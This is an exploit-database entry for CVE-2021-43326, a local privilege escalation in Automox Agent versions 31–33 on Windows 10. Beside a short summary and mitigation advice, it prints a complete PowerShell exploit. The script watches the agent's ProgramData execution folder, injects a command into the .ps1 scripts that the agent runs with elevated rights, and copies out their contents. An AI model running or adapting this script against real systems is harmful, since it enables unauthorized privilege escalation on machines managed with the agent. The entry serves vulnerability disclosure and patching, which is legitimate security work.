header-logo
Suggest Exploit
vendor:
Automox Agent
by:
Greg Foss
7.8
CVSS
HIGH
Local Privilege Escalation
CWE
Product Name: Automox Agent
Affected Version From: 31
Affected Version To: 33
Patch Exists: NO
Related CWE: CVE-2021-43326
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10
2021

Automox Agent 32 – Local Privilege Escalation

This exploit allows an attacker to escalate their privileges locally on a system running Automox Agent 32. By manipulating the agent's script files, the attacker can execute arbitrary commands with elevated privileges.

Mitigation:

Apply the vendor-provided patch or upgrade to a version that is not affected. Restrict access to the Automox Agent directory to trusted users only.
Source

Exploit-DB raw data:

# Exploit Title: Automox Agent 32 - Local Privilege Escalation
# Date: 13/12/2021
# Exploit Author: Greg Foss
# Writeup: https://www.lacework.com/blog/cve-2021-43326/
# Vendor Homepage: https://www.automox.com/
# Software Link: https://support.automox.com/help/agents
# Version: 31, 32, 33
# Tested on: Windows 10
# Language: PowerShell
# CVE: CVE-2021-43326

New-Item -ItemType Directory -Force -Path $HOME\Desktop\automox\
$payload = "whoami >> $HOME\Desktop\automox\who.txt"
echo ""
echo "Watching for Automox agent interaction..."
echo ""
for (($i = 0); $i -lt 500; $i++) {
    if (Test-Path -Path \ProgramData\amagent\execDir*\*.ps1) {
        try {
            $dir = Get-ChildItem \ProgramData\amagent\execDir* | Select-Object Name
            $dir = $dir.name
            $file = Get-ChildItem \ProgramData\amagent\$dir\*.ps1 | Select-Object Name
            $file = $file.name
            (Get-Content -Path \ProgramData\amagent\$dir\$file -Raw) -replace "#endregion", "$payload" | Set-Content -Path \ProgramData\amagent\$dir\$file
            cp -r \ProgramData\amagent\$dir $HOME\Desktop\automox\
            echo 'popped :-)'
            Start-Sleep 5
            echo ''
            echo 'cloning all powershell script content...'
            for (($i = 0); $i -lt 100; $i++) {
                cp -r \ProgramData\amagent\* $HOME\Desktop\automox\ -Force
                Start-Sleep 1
            }
            exit
        } catch {
            throw $_.Exception.Message
        }
    } else {
        echo $i
        Start-Sleep 1
    }
}

Navigation

Suggest Exploit

Services By CQR